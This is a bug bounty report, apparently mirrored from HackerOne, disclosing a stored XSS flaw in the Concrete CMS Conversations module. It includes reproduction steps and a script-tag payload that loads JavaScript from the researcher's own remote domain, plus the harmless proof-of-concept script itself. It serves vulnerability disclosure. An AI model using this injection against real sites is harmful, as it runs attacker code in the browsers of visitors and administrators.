Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneBl4deH1:616770
HistoryJun 17, 2019 - 1:04 a.m.

Concrete CMS: Stored XSS in Conversations (both client and admin) when Active Conversation Editor is set to "Rich Text"

2019-06-1701:04:07
bl4de
hackerone.com
35

EPSS

0.001

Percentile

22.7%

JSON

Hi concrete5 Team,

Summary

I’ve identified Stored XSS vulnerability in concrete5 Conversations module, when Active Conversation Editor is set to “Rich Text”. An attacker is able to input malicious JavaScript, which is run in both client (agains any site visitor) as well as against any user logged into admin panel and visiting Conversations->Messages screen.

Severity: External Attack Vector; Core CMS

Core Version - 8.5.2a1
Version Installed - 8.5.2a1
Database Version - 20190520171430

commit aeaa924977ee87220b7f2d2dadc25d5a24b9e2a1

There are also some crayons here and there :)

Steps to reproduce

(All steps were made in concrete5 with default Elemental theme)

  • make sure that Active Conversation Editor in System & Settings->Conversations->Settings is set to Rich Text

  • go to any blog entry which allows to add a comment

  • in rich text editor, make sure you click “Source” button first. That will save HTML with <script> tag and JavaScript payload “as-is” in database

  • put following payload in comment field:

<script src="http://bl4de.tech/poc.js"></script>

{F510304}

  • post comment

  • you will immediately notice the payload is executed

  • you can verify this is Stored XSS opening the page in any other browser, as an anonymous or logged in user:

Chrome

{F510307}

Firefox

{F510308}

Also, the payload is not visible. Below is the difference in comment when Source button was on and off (with the same payload as provided above):

{F510305}

  • verify that payload is also executed in administration panel by going to Conversations->Messages screen:

{F510306}

Impact

An attacker is able to execute malicious JavaScript against any user, in both client and backend of the concrete5 application.

Testing environment

  • concrete 8.5.2a1, installed locally from branch develop
  • PHP/7.1.23 (macOS)
  • Apache/2.4.34 (macOS)
  • MySQL Community Server 8.0.16 for macOS 10.14
  • Chromium 77.0.3826.0
  • Google Chrome 74.0.3729.169
  • Firefox 67.0.2

Content of http://bl4de.tech/poc.js used in PoC as payload:

'use strict'
const msg = 'This file is loaded from bl4de.tech domain and executed in context of ' + document.domain;
console.log(msg)
window['alert'](msg)

Best Regards,

Rafal ‘bl4de’ Janicki

Impact

An attacker is able to execute malicious JavaScript against any user, in both client and backend of application.

Related

prion 1
cve 1
nvd 1
cnvd 1
cvelist 1
openvas 1
prion
prion
Cross site scripting
2021-09-24 15:15:00
cve
cve
CVE-2021-40100
2021-09-24 15:15:08
nvd
nvd
CVE-2021-40100
2021-09-24 15:15:08
cnvd
cnvd
Concrete CMS Cross-Site Scripting Vulnerability
2021-09-26 00:00:00
cvelist
cvelist
CVE-2021-40100
2021-09-24 14:57:20
openvas
openvas
Concrete CMS < 8.5.6 Multiple Vulnerabilities
2021-10-05 00:00:00

EPSS

0.001

Percentile

22.7%

JSON
Related for H1:616770
prion1cve1nvd1cnvd1cvelist1openvas1